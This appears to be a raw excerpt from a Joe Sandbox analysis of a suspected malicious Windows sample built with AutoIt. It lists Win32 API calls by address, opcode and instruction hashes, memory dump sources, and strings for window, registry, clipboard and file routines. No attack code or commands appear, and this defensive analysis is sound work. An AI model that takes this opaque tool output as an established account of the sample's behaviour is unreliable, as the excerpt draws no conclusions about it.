                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                      APIs
                                                      • DeleteObject.GDI32(?), ref: 0045953B
                                                      • DeleteObject.GDI32(?), ref: 00459551
                                                      • DestroyWindow.USER32(?), ref: 00459563
                                                      • GetDesktopWindow.USER32 ref: 00459581
                                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                                      • _wcslen.LIBCMT ref: 00459916
                                                      • _wcscpy.LIBCMT ref: 0045993A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                      • GetDC.USER32(00000000), ref: 004599FC
                                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                      Similarity
                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                                      • SelectObject.GDI32(?,?), ref: 00441874
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                      • DeleteObject.GDI32(?), ref: 004418D5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                      • FillRect.USER32(?,?,?), ref: 00441970
                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004590F2
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-3360698832
                                                      • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                      • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• SetCursor.USER32(00000000), ref: 0043075B
• LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
• SetCursor.USER32(00000000), ref: 00430773
• LoadCursorW.USER32(00000000,00007F03), ref: 00430784
• SetCursor.USER32(00000000), ref: 0043078B
• LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
• SetCursor.USER32(00000000), ref: 004307A3
• LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
• SetCursor.USER32(00000000), ref: 004307BB
• LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
• SetCursor.USER32(00000000), ref: 004307D3
• LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
• SetCursor.USER32(00000000), ref: 004307EB
• LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
• SetCursor.USER32(00000000), ref: 00430803
• LoadCursorW.USER32(00000000,00007F85), ref: 00430814
• SetCursor.USER32(00000000), ref: 0043081B
• LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
• SetCursor.USER32(00000000), ref: 00430833
• LoadCursorW.USER32(00000000,00007F84), ref: 00430844
• SetCursor.USER32(00000000), ref: 0043084B
• LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
• SetCursor.USER32(00000000), ref: 00430863
• LoadCursorW.USER32(00000000,00007F02), ref: 00430874
• SetCursor.USER32(00000000), ref: 0043087B
• SetCursor.USER32(00000000), ref: 00430887
• LoadCursorW.USER32(00000000,00007F00), ref: 00430898
• SetCursor.USER32(00000000), ref: 0043089F
Similarity
• API ID: Cursor$Load
• String ID:
• API String ID: 1675784387-0
• Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
• Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
• Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
• Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
APIs
• GetSysColor.USER32(0000000E), ref: 00430913
• SetTextColor.GDI32(?,00000000), ref: 0043091B
• GetSysColor.USER32(00000012), ref: 00430933
• SetTextColor.GDI32(?,?), ref: 0043093B
• GetSysColorBrush.USER32(0000000F), ref: 0043094E
• GetSysColor.USER32(0000000F), ref: 00430959
• CreateSolidBrush.GDI32(?), ref: 00430962
• GetSysColor.USER32(00000011), ref: 00430979
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
• SelectObject.GDI32(?,00000000), ref: 0043099C
• SetBkColor.GDI32(?,?), ref: 004309A6
• SelectObject.GDI32(?,?), ref: 004309B4
• InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
• GetWindowLongW.USER32(?,000000F0), ref: 00430A09
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
• GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
• InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
• DrawFocusRect.USER32(?,?), ref: 00430A91
• GetSysColor.USER32(00000011), ref: 00430A9F
• SetTextColor.GDI32(?,00000000), ref: 00430AA7
• DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
• SelectObject.GDI32(?,?), ref: 00430AD0
• DeleteObject.GDI32(00000105), ref: 00430ADC
• SelectObject.GDI32(?,?), ref: 00430AE3
• DeleteObject.GDI32(?), ref: 00430AE9
• SetTextColor.GDI32(?,?), ref: 00430AF0
• SetBkColor.GDI32(?,?), ref: 00430AFB
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1582027408-0
• Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
• Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
• Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
• Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
• RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
Similarity
• API ID: CloseConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 3217815495-966354055
• Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
• Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
• Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
• Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
APIs
• GetCursorPos.USER32(?), ref: 004566AE
• GetDesktopWindow.USER32 ref: 004566C3
• GetWindowRect.USER32(00000000), ref: 004566CA
• GetWindowLongW.USER32(?,000000F0), ref: 00456722
• GetWindowLongW.USER32(?,000000F0), ref: 00456735
• DestroyWindow.USER32(?), ref: 00456746
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
• SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
• SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
• IsWindowVisible.USER32(?), ref: 0045682C
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
• GetWindowRect.USER32(?,?), ref: 00456873
• MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
• GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
• CopyRect.USER32(?,?), ref: 004568BE
• SendMessageW.USER32(?,00000412,00000000), ref: 00456914
Similarity
• API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
• API String ID: 225202481-3320066284
• Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
• Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
• Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
• Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
• Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
• Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
• Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
• Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
• API String ID: 867697134-3359773793
• Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
• Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
• Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
• Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
• Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
• Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
• Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
• Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                      • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                      APIs
                                                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                      • _fseek.LIBCMT ref: 00452B3B
                                                      • __wsplitpath.LIBCMT ref: 00452B9B
                                                      • _wcscpy.LIBCMT ref: 00452BB0
                                                      • _wcscat.LIBCMT ref: 00452BC5
                                                      • __wsplitpath.LIBCMT ref: 00452BEF
                                                      • _wcscat.LIBCMT ref: 00452C07
                                                      • _wcscat.LIBCMT ref: 00452C1C
                                                      • __fread_nolock.LIBCMT ref: 00452C53
                                                      • __fread_nolock.LIBCMT ref: 00452C64
                                                      • __fread_nolock.LIBCMT ref: 00452C83
                                                      • __fread_nolock.LIBCMT ref: 00452C94
                                                      • __fread_nolock.LIBCMT ref: 00452CB5
                                                      • __fread_nolock.LIBCMT ref: 00452CC6
                                                      • __fread_nolock.LIBCMT ref: 00452CD7
                                                      • __fread_nolock.LIBCMT ref: 00452CE8
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                      • __fread_nolock.LIBCMT ref: 00452D78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
